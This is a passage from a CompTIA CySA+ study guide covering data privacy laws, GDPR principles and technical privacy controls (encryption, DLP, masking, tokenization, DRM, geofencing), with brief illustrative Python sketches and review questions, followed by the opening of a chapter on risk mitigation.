2. PCI DSS
3. SOX
4. HIPAA
7. Which control provides data confidentiality?
1. Encryption
2. Hashing
3. Redundancy
4. Digital signatures
8. Which control provides data integrity?
1. Encryption
2. Hashing
3. Redundancy
4. Digital signatures
9. Which of the following means altering data from its original
state to protect it?
1. Deidentification
2. Data masking
3. DLP
4. Digital signatures
FOUNDATION TOPICS
PRIVACY VS. SECURITY
Privacy relates to rights to control the sharing and use of one’s
personal information, commonly called personally identifiable
information (PII), as described in Chapter 15, “The Incident
Response Process.” Privacy of data relies heavily on the security
controls that are in place. While organizations can provide
security without ensuring data privacy, data privacy cannot
exist without the appropriate security controls. A privacy
impact assessment (PIA) is a risk assessment that determines
risks associated with PII collection, use, storage, and
transmission. A PIA should determine whether appropriate PII
controls and safeguards are implemented to prevent PII
disclosure or compromise. The PIA should evaluate personnel,
processes, technologies, and devices. Any significant change
should result in another PIA review.
As part of prevention of privacy policy violations, any
contracted third parties that have access to PII should be
assessed to ensure that the appropriate controls are in place. In
addition, third-party personnel should be familiarized with
organizational policies and should sign non-disclosure
agreements (NDAs).
NON-TECHNICAL CONTROLS
Non-technical controls are implemented without technology
and consist of the organization’s policies and procedures for
maintaining data privacy and protection. This section describes
some of these non-technical controls, which are also sometimes
called administrative controls. Non-technical controls are
covered in detail in Chapter 3, “Vulnerability Management
Activities.”
Classification
Data classification helps to ensure that appropriate security
measures are taken with regard to sensitive data types and is
covered in Chapter 13, “The Importance of Proactive Threat
Hunting.”
Ownership
In Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” you will learn more about policies
that act as non-technical controls. One of those policies is the
data ownership policy, which is closely related to the data
classification policy (covered in Chapter 13). Often, the two
policies are combined because, typically, the data owner is
tasked with classifying the data. Therefore, the data ownership
policy covers how the owner of each piece of data or each data
set is identified. In most cases, the creator of the data is the
owner, but some organizations may deem all data created by a
department to be owned by the department head. Another way
a user may become the owner of data is by introducing into the
organization data the user did not create. Perhaps the data was
purchased from a third party. In any case, the data ownership
policy should outline both how data ownership occurs and the
responsibilities of the owner with respect to determining the
data classification and identifying those with access to the data.
Retention
Another policy that acts as a non-technical control is the data
retention policy, which outlines how various data types must be
retained and may rely on the data classifications described in
the data classification policy. Data retention requirements vary
based on several factors, including data type, data age, and legal
and regulatory requirements. Security professionals must
understand where data is stored and the type of data stored. In
addition, security professionals should provide guidance on
managing and archiving data securely. Therefore, each data
retention policy must be established with the help of
organizational personnel.
A data retention policy usually identifies the purpose of the
policy, the portion of the organization affected by the policy, any
exclusions to the policy, the personnel responsible for
overseeing the policy, the personnel responsible for data
destruction, the data types covered by the policy, and the
retention schedule. Security professionals should work with
data owners to develop the appropriate data retention policy for
each type of data the organization owns. Examples of data types
include, but are not limited to, human resources data, accounts
payable/receivable data, sales data, customer data, and e-mail.
Designing a data retention policy is covered more fully in the
upcoming section “Retention Standards.”
Data Types
Categorizing data types is a non-technical control for ensuring
data privacy and protection. To properly categorize data types, a
security analyst should be familiar with some of the most
sensitive types of data that the organization may possess, as
described in the sections that follow.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy is a
major concern of users. This privacy concern usually involves
three areas: which personal information can be shared with
whom, whether messages can be exchanged confidentially, and
whether and how one can send messages anonymously. Privacy
is an integral part of any security measures that an organization
takes. As part of the security measures that organizations must
take to protect privacy, PII must be understood, identified, and
protected. Refer to Chapter 15 for more details about protecting
PII.
Personal Health Information (PHI)
PHI is a particular type of PII that an organization may possess,
particularly healthcare organizations. Chapter 15 also provides
more details about protecting PHI.
Payment Card Information
Another type of PII that almost all companies possess is credit
card data. Holders of this data must protect it. Many of the
highest-profile security breaches that have occurred have
involved the theft of this data. The Payment Card Industry
Data Security Standard (PCI DSS) applies to this type of
data. The handling of payment card information is covered in
Chapter 5, “Threats and Vulnerabilities Associated with
Specialized Technology.”
Retention Standards
Retention standards are another non-technical control for
ensuring data privacy and protection. Retention standards are
covered in Chapter 21.
Confidentiality
The three fundamentals of security are confidentiality, integrity,
and availability (CIA). Most security issues result in a violation
of at least one facet of the CIA triad. Understanding these three
security principles will help security professionals ensure that
the security controls and mechanisms implemented protect at
least one of these principles.
To ensure confidentiality, you must prevent the disclosure of
data or information to unauthorized entities. As part of
confidentiality, the sensitivity level of data must be determined
before any access controls are put in place. Data with a higher
sensitivity level will have more access controls in place than
data with a lower sensitivity level. The opposite of
confidentiality is disclosure. Most security professionals
consider confidentiality as it relates to data on a network or
devices. However, data can also exist in printed format.
Appropriate controls should be put into place to protect data on
a network, but data in its printed format needs to be protected,
too, which involves implementing data disposal policies.
Examples of controls that improve confidentiality include
encryption, steganography, access control lists (ACLs), and data
classification.
Legal Requirements
Legal requirements are a form of non-technical controls that
can mandate technical controls. In some cases, the design of
controls will be driven by legal requirements that apply to the
organization based on the industry or sector in which it
operates. In Chapter 15 you learned the importance of
recognizing legal responsibilities during an incident response.
Let’s examine some of the laws and regulations that may come
into play.
The United States and European Union (EU) both have
established laws and regulations that affect organizations that
operate within their area of governance. While security
professionals should strive to understand laws and regulations,
security professionals may not have the level of knowledge and
background to fully interpret these laws and regulations to
protect their organization. In these cases, security professionals
should work with legal representation regarding legislative or
regulatory compliance.
Security analysts must be aware of the laws and, at a minimum,
understand how the laws affect the operations of their
organization. For example, a security professional working for a
healthcare facility would need to understand all security
guidelines in HIPAA and PPACA, described next. The following
are the most significant laws that may affect an organization
and its security policy:
Sarbanes-Oxley Act (SOX): Also known as the Public Company
Accounting Reform and Investor Protection Act of 2002, affects any
organization that is publicly traded in the United States. It controls
the accounting methods and financial reporting for the
organizations and stipulates penalties and even jail time for
executive officers.
Health Insurance Portability and Accountability Act
(HIPAA): Also known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and healthcare
clearinghouses. It is enforced by the Office for Civil Rights (OCR) of
the Department of Health and Human Services (HHS). It provides
standards and procedures for storing, using, and transmitting
medical information and healthcare data. HIPAA overrides state
laws unless the state laws are stricter. It was later amended by the
Patient Protection and Affordable Care Act (PPACA), commonly
known as Obamacare.
Gramm-Leach-Bliley Act (GLBA) of 1999: Affects all financial
institutions, including banks, loan companies, insurance
companies, investment companies, and credit card providers. It
provides guidelines for securing all financial information and
prohibits sharing financial information with third parties. This act
directly affects the security of PII.
Computer Fraud and Abuse Act (CFAA) of 1986: Affects any
entities that engage in hacking of “protected computers,” as defined
in the act. It was amended in 1989, 1994, and 1996; in 2001 by the
USA PATRIOT Act (listed below); in 2002; and in 2008 by the
Identity Theft Enforcement and Restitution Act. A “protected
computer” is a computer used exclusively by a financial institution
or the U.S. government or used in or affecting interstate or foreign
commerce or communication, including a computer located outside
the United States that is used in a manner that affects interstate or
foreign commerce or communication of the United States. Due to
the interstate nature of most Internet communication, any ordinary
computer has come under the jurisdiction of the law, including cell
phones. The law includes several definitions of hacking, including
knowingly accessing a computer without authorization;
intentionally accessing a computer to obtain financial records, U.S.
government information, or protected computer information; and
transmitting fraudulent commerce communication with the intent
to extort.
Federal Privacy Act of 1974: Affects any computer that
contains records used by a federal agency. It provides guidelines on
the collection, maintenance, use, and dissemination of PII about
individuals that is maintained in systems of records by federal
agencies.
Foreign Intelligence Surveillance Act (FISA) of 1978:
Affects law enforcement and intelligence agencies. It was the first
act to give procedures for the physical and electronic surveillance
and collection of “foreign intelligence information” between
“foreign powers” and “agents of foreign powers” and applied only to
traffic within the United States. It was amended by the USA
PATRIOT Act of 2001 and the FISA Amendments Act of 2008.
Electronic Communications Privacy Act (ECPA) of 1986:
Affects law enforcement and intelligence agencies. It extended
government restrictions on wiretaps from telephone calls to include
transmissions of electronic data by computer and prohibited access
to stored electronic communications. It was amended by the
Communications Assistance for Law Enforcement Act (CALEA) of
1994, the USA PATRIOT Act of 2001, and the FISA Amendments
Act of 2008.
Computer Security Act of 1987: Superseded in 2002 by FISMA
(listed below), the first law to require a formal computer security
plan. It was written to protect and defend the sensitive information
in the federal government systems and provide security for that
information. It also placed requirements on government agencies to
train employees and identify sensitive systems.
United States Federal Sentencing Guidelines of 1991:
Affects individuals and organizations convicted of felonies and
serious (Class A) misdemeanors. It provides guidelines to prevent
sentencing disparities that existed across the United States.
Communications Assistance for Law Enforcement Act
(CALEA) of 1994: Affects law enforcement and intelligence
agencies. It requires telecommunications carriers and
manufacturers of telecommunications equipment to modify and
design their equipment, facilities, and services to ensure that they
have built-in surveillance capabilities. This allows federal agencies
to monitor all telephone, broadband Internet, and voice over IP
(VoIP) traffic in real time.
Personal Information Protection and Electronic
Documents Act (PIPEDA): Affects how private-sector
organizations collect, use, and disclose personal information in the
course of commercial business in Canada. The act was written to
address EU concerns about the security of PII in Canada. The law
requires organizations to obtain consent when they collect, use, or
disclose personal information and to have personal information
policies that are clear, understandable, and readily available.
Basel II: Affects financial institutions. It addresses minimum
capital requirements, supervisory review, and market discipline. Its
main purpose is to protect against risks that banks and other
financial institutions face.
Federal Information Security Management Act (FISMA)
of 2002: Affects every federal agency. It requires federal agencies
to develop, document, and implement an agencywide information
security program.
Economic Espionage Act of 1996: Affects companies that have
trade secrets and any individuals who plan to use encryption
technology for criminal activities. This act covers a multitude of
issues because of the way it was structured. A trade secret does not
need to be tangible to be protected by this act. Per this law, theft of
a trade secret is now a federal crime, and the United States
Sentencing Commission must provide specific information in its
reports regarding encryption or scrambling technology that is used
illegally.
USA PATRIOT Act of 2001: Formally known as Uniting and
Strengthening America by Providing Appropriate Tools Required
to Intercept and Obstruct Terrorism, it affects law enforcement and
intelligence agencies in the United States. Its purpose is to enhance
the investigatory tools that law enforcement can use, including access to email communications, telephone records, Internet communications, medical records, and financial records. When this
law was enacted, it amended several other laws, including FISA and
the ECPA of 1986. The USA PATRIOT Act does not restrict private
citizens’ use of investigatory tools, although there are some
exceptions—for example, if the private citizen is acting as a
government agent (even if not formally employed), if the private
citizen conducts a search that would require law enforcement to
have a warrant, if the government is aware of the private citizen’s
search, or if the private citizen is performing a search to help the
government.
Health Care and Education Reconciliation Act of 2010:
Affects healthcare and educational organizations. This act increased
some of the security measures that must be taken to protect
healthcare information.
Employee Privacy Issues and Expectation of Privacy:
Employee privacy issues must be addressed by all organizations to
ensure that the organizations are protected from costly legal
penalties that result from data breaches. However, organizations
must give employees the proper notice of any monitoring that might
be used. Organizations must also ensure that the monitoring of
employees is applied in a consistent manner. Many organizations
implement a no-expectation-of-privacy policy that the employee
must sign after receiving the appropriate training. This policy
should specifically describe any unacceptable behavior. Companies
should also keep in mind that some actions are protected by the
Fourth Amendment. Security professionals and senior management
should consult with legal counsel when designing and
implementing any monitoring solution.
European Union: The EU has implemented several laws and
regulations that affect security and privacy. The EU Principles on
Privacy include strict laws to protect private data. The EU's Data Protection Directive provided direction on how to follow the laws set forth in those principles; it has since been superseded by the General Data Protection Regulation (GDPR). The EU created the Safe Harbor Privacy Principles to help guide U.S. organizations in compliance with the EU Principles on Privacy. The following are some of the guidelines as updated by the GDPR.
Personal data may not be processed unless there is at least one legal
basis to do so. Article 6 states the lawful purposes are
If the data subject has given consent to the processing of his or
her personal data
To fulfill contractual obligations with a data subject, or for tasks
at the request of a data subject who is in the process of entering
into a contract
To comply with a data controller’s legal obligations
To protect the vital interests of a data subject or another
individual
To perform a task in the public interest or in official authority
For the legitimate interests of a data controller or a third party, unless these interests are overridden by the interests of the data subject or his or her rights under the Charter of Fundamental Rights (especially in the case of children)
Note
Do not confuse the terms safe harbor and data haven. According to the EU, a
safe harbor is an entity that conforms to all the requirements of the EU
Principles on Privacy. A data haven is a country that fails to legally protect
personal data, with the main aim being to attract companies engaged in the
collection of the data.
The EU Electronic Signatures Directive defines electronic signature principles. In this directive, a signature must be uniquely linked to the signer and to the data to which it relates so that any subsequent data change is detectable. The signature must be capable of identifying the signer.
Data Sovereignty
Data sovereignty is the concept that data stored in digital
format is subject to the laws of the country in which the data is
located. Affecting this concept are the differing privacy laws and
regulations issued by nations and governing bodies. This
concept is further complicated by the deploying of cloud
solutions.
Many countries have adopted legislation that requires customer
data to be kept within the country in which the customer
resides. But organizations are finding it increasingly difficult to
ensure that this is the case when working with service providers
and other third parties. Organizations should consult the service-level agreements (SLAs) they have with these providers to verify compliance.
Keep in mind, however, that the laws of multiple countries may
affect the data. For instance, suppose an organization in the
United States is using a data center in the United States but the
data center is operated by a company from France. The data
would then be subject to both U.S. and EU laws and regulations.
Another factor is the type of data being stored, as different types of data are regulated differently. Healthcare data and consumer data, for example, are governed by very different laws regulating the transmission and storage of that data.
Security professionals should answer the following questions:
Where is the data stored?
Who has access to the data?
Where is the data backed up?
How is the data encrypted?
The answers to these four questions will help security
professionals design a governance strategy for their
organization that will aid in addressing any data sovereignty
concerns. Remember that the responsibility to meet data
regulations falls on both the organization that owns the data
and the vendor providing the data storage service, if any.
Data Minimization
Organizations should minimize the amount of personal data
they store to what is necessary. An important principle in the
European Union’s General Data Protection Regulation (GDPR)
is data minimization. Data processing should only use as much
data as is required to successfully accomplish a given task. By
reducing the amount of personal data, the attack surface is also
reduced.
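To make the principle concrete, the following is a minimal Python sketch of data minimization; the record fields and the outbreak-tracking task are hypothetical, and a real implementation would be driven by a documented processing purpose.

REQUIRED_FIELDS = {"patient_id", "zip_code", "diagnosis_code"}  # fields the task actually needs

def minimize(record):
    """Return a copy of the record limited to the required fields."""
    return {field: value for field, value in record.items() if field in REQUIRED_FIELDS}

full_record = {
    "patient_id": "P-1001",
    "name": "Jane Doe",       # not needed for outbreak tracking
    "ssn": "123-45-6789",     # not needed for outbreak tracking
    "zip_code": "30301",
    "diagnosis_code": "J10",
}
print(minimize(full_record))  # only the three required fields remain

By discarding the name and Social Security number before processing, the attack surface of the downstream task shrinks along with the data.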
Purpose Limitation
Another key principle in the European Union’s GDPR that is
finding wide adoption is that of purpose limitation. Personal
data collected for one purpose cannot be repurposed without
further consent from the individual. For example, data collected to track a disease outbreak cannot later be used to identify the individuals involved.
Non-Disclosure Agreement (NDA)
In Chapter 15 you learned about various types of intellectual
property, such as patents, copyrights, and trade secrets. Most
organizations that have trade secrets attempt to protect them by
using NDAs. An NDA must be signed by any entity that has
access to information that is part of a trade secret. Anyone who
signs an NDA will suffer legal consequences if the organization
is able to prove that the signer violated it.
TECHNICAL CONTROLS
Technical controls are implemented with technology and
include items such as firewalls, access lists (ACLs), permissions
on files and folders, and devices that identify and prevent
threats. After an organization understands the threats it faces, it needs to establish their likelihoods and impacts and select controls that address each threat without costing more than the cost of the realized threat itself. The review of these controls should be an ongoing process.
Encryption
In Chapter 8, “Security Solutions for Infrastructure
Management,” you learned about encryption and cryptography.
These technologies comprise a technical control that can be
used to provide the confidentiality objective of the CIA triad.
Information assets can be protected from being accessed by
unauthorized parties by encrypting data at rest (while stored)
and data in transit (when crossing a network). As you also
learned, cryptography in the form of hashing algorithms can also provide a way to assess data integrity.
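As a simple illustration, the following Python sketch encrypts data at rest and uses a hash to check integrity. It assumes the third-party cryptography package (pip install cryptography); key storage and data-in-transit protection are out of scope here.

import hashlib
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # in practice, protect this key (for example, in a key vault)
cipher = Fernet(key)

plaintext = b"Quarterly financials - confidential"
ciphertext = cipher.encrypt(plaintext)           # confidentiality for data at rest
digest = hashlib.sha256(plaintext).hexdigest()   # integrity reference value

recovered = cipher.decrypt(ciphertext)                  # later retrieval
assert hashlib.sha256(recovered).hexdigest() == digest  # confirms the data was not altered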
Data Loss Prevention (DLP)
Chapter 12, “Implementing Configuration Changes to Existing
Controls to Improve Security,” described data loss prevention
(DLP) systems. As you learned, DLP systems are used to
prevent data exfiltration, which is the intentional or
unintentional loss of sensitive data from the network. DLP
comprises a strong technical control that protects both integrity
and confidentiality.
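A full DLP product inspects content against many detectors and policies, but the core content-inspection idea can be sketched in a few lines of Python; the pattern below is a simplified, illustrative detector for card-like numbers, not a production rule.

import re

CARD_PATTERN = re.compile(r"\b(?:\d[ -]?){13,16}\b")  # 13-16 digits with optional separators

def flag_outbound(message):
    """Return True if the outbound message appears to contain a card number."""
    return bool(CARD_PATTERN.search(message))

print(flag_outbound("Invoice total is $42"))         # False
print(flag_outbound("Card: 4111 1111 1111 1111"))    # True: block the transfer or alert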
Data Masking
Data masking means altering data from its original state to
protect it. You already learned about two forms of masking,
encryption (storing the data in an encrypted form) and hashing
(storing a hash value, generated from the data by a hashing
algorithm, rather than the data itself). Many passwords are
stored as hash values.
The following are some other methods of data masking (a code sketch follows the list):
Using substitution tables and aliases for the data
Redacting, or replacing the sensitive data with a random value
Averaging individual values (adding them and dividing by the number of values) or aggregating them (totaling them and using only the total value)
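The short Python sketch below illustrates these methods; the substitution table and values are hypothetical.

import random

ALIASES = {"Acme Corp": "Customer-017"}  # substitution table

def substitute(value):
    """Replace the real value with its alias."""
    return ALIASES.get(value, value)

def redact(value):
    """Replace sensitive data with a random value of the same length."""
    return "".join(str(random.randint(0, 9)) for _ in value)

def average(values):
    """Replace individual values with a single averaged figure."""
    return sum(values) / len(values)

print(substitute("Acme Corp"))           # Customer-017
print(redact("555-0100"))                # e.g., 82731904 (random digits)
print(average([41000, 52000, 47000]))    # one figure instead of three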
Deidentification
Data deidentification or data anonymization is the process of
deleting or masking personal identifiers, such as personal
names, from a set of data. Deidentification is often done when
the data is being used in the aggregate, such as when medical
data is used for research. It is a technical control that is used as
one of the main approaches to ensuring data privacy protection.
Tokenization
Tokenization is another form of data hiding or masking in
that it replaces a value with a token that is used instead of the
actual value. For example, tokenization is an emerging standard for mobile transactions; numeric tokens are used to protect cardholders' sensitive credit and debit card information. This security feature substitutes the primary account number with a numeric token that can be processed by
all participants in the payment ecosystem. Figure 19-1 shows the
use of tokens in a credit card transaction using a smartphone.
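Conceptually, a token vault holds the only mapping between tokens and real values. The Python sketch below shows the idea; real payment tokenization follows industry standards and adds collision handling, access control, and auditing.

import secrets

class TokenVault:
    """Maps tokens to real values; only the vault can reverse a token."""
    def __init__(self):
        self._store = {}

    def tokenize(self, pan):
        token = "".join(secrets.choice("0123456789") for _ in range(16))
        self._store[token] = pan
        return token

    def detokenize(self, token):
        return self._store[token]

vault = TokenVault()
token = vault.tokenize("4111111111111111")
print(token)                     # numeric token, safe to pass through the payment ecosystem
print(vault.detokenize(token))   # the real PAN, available only via the vault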
Digital Rights Management (DRM)
Hardware manufacturers, publishers, copyright holders, and
individuals use digital rights management (DRM) to
control the use of digital content. DRM often also involves
device controls. First-generation DRM software controls
copying. Second-generation DRM software controls executing,
viewing, copying, printing, and altering works or devices.
The U.S. Digital Millennium Copyright Act (DMCA) of
1998 imposes criminal penalties on those who make available
technologies whose primary purpose is to circumvent content
protection technologies. DRM includes restrictive license
agreements and encryption. DRM protects computer games and
other software, documents, e-books, films, music, and
television.
FIGURE 19-1 Tokenization
In most enterprise implementations, the primary concern is the
DRM control of documents by using open, edit, print, or copy
access restrictions that are granted on a permanent or
temporary basis. Solutions can be deployed that store the
protected data in a central or decentralized model. Encryption is
used in the DRM implementation to protect the data both at
rest and in transit.
Today’s DRM implementations include the following:
Directories:
Lightweight Directory Access Protocol (LDAP)
Active Directory (AD)
Custom
Permissions:
Open
Print
Modify
Clipboard
Additional controls:
Expiration (absolute, relative, immediate revocation)
Version control
Change policy on existing documents
Watermarking
Online/offline
Auditing
Ad hoc and structured processes:
User initiated on desktop
Mapped to system
Built into workflow process
Document DRM
Organizations implement DRM to protect confidential or
sensitive documents and data. Commercial DRM products allow
organizations to protect documents and include the capability
to restrict and audit access to documents. Some of the
permissions that can be restricted using DRM products include
reading and modifying a file, removing and adding watermarks,
downloading and saving a file, printing a file, or even taking
screenshots. If a DRM product is implemented, the organization
should ensure that the administrator is properly trained and
that policies are in place to ensure that rights are appropriately
granted and revoked.
Music DRM
DRM has been used in the music industry for some time now.
Subscription-based music services, such as Napster, use DRM
to revoke a user’s access to downloaded music once their
subscription expires. While technology companies have
petitioned the music industry to allow them to sell music
without DRM, the industry has been reluctant to do so.
Movie DRM
While the movie industry has used a variety of DRM schemes
over the years, two main technologies are used for the mass
distribution of media:
Content Scrambling System (CSS): Uses encryption to enforce playback and region restrictions on DVDs. This system can be broken using the DeCSS tool.
Advanced Access Content System (AACS): Protects Blu-ray
and HD DVD content. Hackers have been able to obtain the
encryption keys to this system.
This industry continues to make advances to prevent hackers
from creating unencrypted copies of copyrighted material.
Video Game DRM
Most video game DRM implementations rely on proprietary
consoles that use Internet connections to verify video game
licenses. Most consoles today verify the license upon installation
and allow unrestricted use from that point. However, to obtain
updates, the license will again be verified prior to download and
installation of the update.
E-Book DRM
E-book DRM is considered to be the most successful DRM
deployment. Both Amazon's Kindle and Barnes & Noble's Nook devices implement DRM to protect electronic forms of
books. Both of these companies have released mobile apps that
function like the physical e-book devices.
Today’s implementation uses a decryption key that is installed
on the device. This means that the e-books cannot be easily
copied between e-book devices or applications. Adobe created the Adobe Digital Experience Protection Technology (ADEPT), which is used by most e-book readers except Amazon's Kindle.
With ADEPT, AES is used to encrypt the media content, and
RSA encrypts the AES key.
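The following Python sketch shows the same hybrid pattern (AES protecting the content, RSA protecting the AES key). It assumes the cryptography package and illustrates the general technique only, not Adobe's actual ADEPT format.

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

reader_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# Publisher side: encrypt the content with a fresh AES key...
content_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(content_key).encrypt(nonce, b"Chapter 1 ...", None)

# ...then wrap the AES key with the reader's RSA public key
oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = reader_key.public_key().encrypt(content_key, oaep)

# Reader side: unwrap the AES key on the device, then decrypt the content
recovered_key = reader_key.decrypt(wrapped_key, oaep)
print(AESGCM(recovered_key).decrypt(nonce, ciphertext, None))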
Watermarking
Digital watermarking is another method used to deter
unauthorized use of a document. Digital watermarking involves
embedding a logo or trademark in documents, pictures, or other
objects. The watermark deters people from using the materials
in an unauthorized manner.
Geographic Access Requirements
While a discussion of geographic issues was included in Chapter 9, note that authentication systems can also make use of geofencing.
Geofencing is the application of geographic limits to where a
device can be used. It depends on the use of Global Positioning
System (GPS) or radio frequency identification (RFID)
technology to create a virtual geographic boundary.
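As a rough illustration, a geofence check reduces to measuring the distance between a device's GPS fix and the fence center. The Python sketch below uses the haversine great-circle formula; the coordinates are illustrative.

from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometers."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))  # mean Earth radius of about 6371 km

def inside_geofence(device, center, radius_km):
    """True if the device's fix falls within the virtual boundary."""
    return haversine_km(*device, *center) <= radius_km

HQ = (33.7490, -84.3880)                               # hypothetical fence center
print(inside_geofence((33.7500, -84.3900), HQ, 1.0))   # True: within the fence
print(inside_geofence((40.7128, -74.0060), HQ, 1.0))   # False: outside the fence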
Access Controls
Chapter 8 covered identity and access management systems in
depth. Along with encryption, access controls are the main
security controls implemented to ensure confidentiality. In
Chapter 21, you will learn how access controls fit into the set of
controls used to maintain security.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 19-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 19-2 Key Topics in Chapter 19
Key Topic Element | Description | Page Number
Bulleted list | Significant data privacy and protection legislation | 511
Section | Description of data sovereignty | 514
Bulleted list | Methods of data masking | 517
Figure 19-1 | Tokenization | 518
Bulleted list | DRM implementations | 519
Bulleted list | DRM schemes | 520
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
privacy
Sarbanes-Oxley Act (SOX)
Health Insurance Portability and Accountability Act (HIPAA)
Gramm-Leach-Bliley Act (GLBA) of 1999
Computer Fraud and Abuse Act (CFAA)
Federal Privacy Act of 1974
Foreign Intelligence Surveillance Act (FISA) of 1978
Electronic Communications Privacy Act (ECPA) of 1986
Computer Security Act of 1987
United States Federal Sentencing Guidelines of 1991
Personal Information Protection and Electronic Documents
Act (PIPEDA)
Basel II
Federal Information Security Management Act (FISMA) of
2002
Economic Espionage Act of 1996
USA PATRIOT Act of 2001
Health Care and Education Reconciliation Act of 2010
employee privacy issues and expectation of privacy
data sovereignty
data masking
deidentification
tokenization
digital rights management (DRM)
U.S. Digital Millennium Copyright Act (DMCA) of 1998
Content Scrambling System (CSS)
Advanced Access Content System (AACS)
digital watermarking
geofencing
REVIEW QUESTIONS
1. Data should be classified based on its ________ to the
organization.
2. List at least two considerations when assigning a level of
criticality.
3. Match the following terms with their definitions.
Terms | Definitions
Sensitivity | A measure of the importance of the data
Criticality | The application of geographic limits to where a device can be used
Geofencing | The concept that data stored in digital format is subject to the laws of the country in which the data is located
Data sovereignty | A measure of how freely data can be handled
4. A ________________ policy outlines how various data
types must be retained and may rely on the data
classifications described in the data classification policy.
5. According to the GDPR, personal data may not be processed
unless there is at least one legal basis to do so. List at least
two of these legal bases.
6. Match the following terms with their definitions.
Terms | Definitions
Tokenization | Protects Blu-ray and HD DVD content, though hackers have been able to obtain the encryption keys to this system
Digital watermarking | Affects any organizations that handle cardholder information for the major credit card companies
AACS | Involves embedding a logo or trademark in documents, pictures, or other objects
PCI DSS | Another form of data hiding or masking in that it replaces a value with a token that is used instead of the actual value
7. _________________ means altering data from its
original state to protect it.
8. List at least one method of data masking.
9. Match the following terms with their definitions.
Terms | Definitions
HIPAA | Affects any organization that is publicly traded in the United States
SOX | Affects any entities that might engage in hacking of “protected computers,” as defined in the act
GLBA | Affects all financial institutions, including banks, loan companies, insurance companies, investment companies, and credit card providers
CFAA | Legislation affecting healthcare facilities
10. _________________ is the application of geographic
limits to where a device can be used.
Chapter 20
Applying Security Concepts
in Support of
Organizational Risk
Mitigation
This chapter covers the following topics related to Objective 5.2
(Given a scenario, apply security concepts in support of
organizational risk mitigation) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
Business impact analysis: Describes how to assess the level of
criticality of business functions to the overall organization.
Risk identification process: Includes classification, ownership,
retention, data types, retention standards, and confidentiality.
Risk calculation: Covers probability and magnitude.
Communication of risk factors: Discusses the process of
sharing with critical parties.
Risk prioritization: Includes security controls and engineering
tradeoffs.
System assessment: Describes the process of system assessment.
Documented compensating controls: Covers the use of
additional controls.
Training and exercises: Includes red team, blue team, white
team, and tabletop exercise.
Supply chain assessment: Covers vendor due diligence and
hardware source authenticity.
The risk management process is a formal method of evaluating
vulnerabilities. A robust risk management process will identify
vulnerabilities that need to be addressed and will generate an
assessment of the impact and likelihood of an attack that takes
advantage of the vulnerability. The process also includes a
formal assessment of possible risk mitigations. This chapter
explores the types of risk management processes and how they
are used to mitigate risk.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 20-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 20-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Question
Business Impact Analysis | 1
Risk Identification Process | 2
Risk Calculation | 3
Communication of Risk Factors | 4
Risk Prioritization | 5
Systems Assessment | 6
Documented Compensating Controls | 7
Training and Exercises | 8
Supply Chain Assessment | 9
1. Which of the following is the first step in the BIA?
a. Identify resource requirements.
b. Identify outage impacts and estimate downtime.
c. Identify critical processes and resources.
d. Identify recovery priorities.
2. Which of the following is not a goal of risk assessment?
a. Identify vulnerabilities and threats.
b. Identify key stakeholders.
c. Identify assets and asset value.
d. Calculate threat probability and business impact.
3. Which of the following is the monetary impact of each threat occurrence?
a. ALE
b. SLE
c. AV
d. EF
4. The non-technical leadership audience needs which of the following to be stressed in the communication of risk factors to stakeholders?
a. The technical risks
b. Security operations difficulties
c. The cost of cybersecurity expenditures
d. Translation of technical risk into common business terms
5. Which of the following processes involves terminating the activity that causes a risk or choosing an alternative that is not as risky?
a. Risk avoidance
b. Risk transfer
c. Risk mitigation
d. Risk acceptance
6. Which of the following occurs when the adequacy of a system’s overall security is accepted by management?
a. Certification
b. Accreditation
c. Acceptance
d. Due diligence
7. To implement ISO/IEC 27001:2013, the project manager should complete which step first?
a. Identify the requirements
b. Obtain management support
c. Perform risk assessment and risk treatment
d. Define the ISMS scope, information security policy, and information security objectives
8. Which of the following are in place to substitute for a primary access control and mainly act to mitigate risks?
a. Compensating controls
b. Secondary controls
c. Accommodating controls
d. Directive controls
9. Which team acts as the attacking force?
a. Green
b. Red
c. Blue
d. White
FOUNDATION TOPICS
BUSINESS IMPACT ANALYSIS
A business impact analysis (BIA) is a functional analysis
that occurs as part of business continuity and planning for
disaster recovery. Performing a thorough BIA will help business
units understand the impact of a disaster. The resulting
document that is produced from a BIA lists the critical and
necessary business functions, their resource dependencies, and
their level of criticality to the overall organization.
The BIA helps the organization to understand what impact a
disruptive event would have on the organization. It is a
management-level analysis that identifies the impact of losing
an organization’s resources.
The four main steps of the BIA are as follows:
1. Identify critical processes and resources.
2. Identify outage impacts and estimate downtime.
3. Identify resource requirements.
4. Identify recovery priorities.
The BIA relies heavily on any vulnerability analysis and risk
assessment that is completed. The vulnerability analysis and
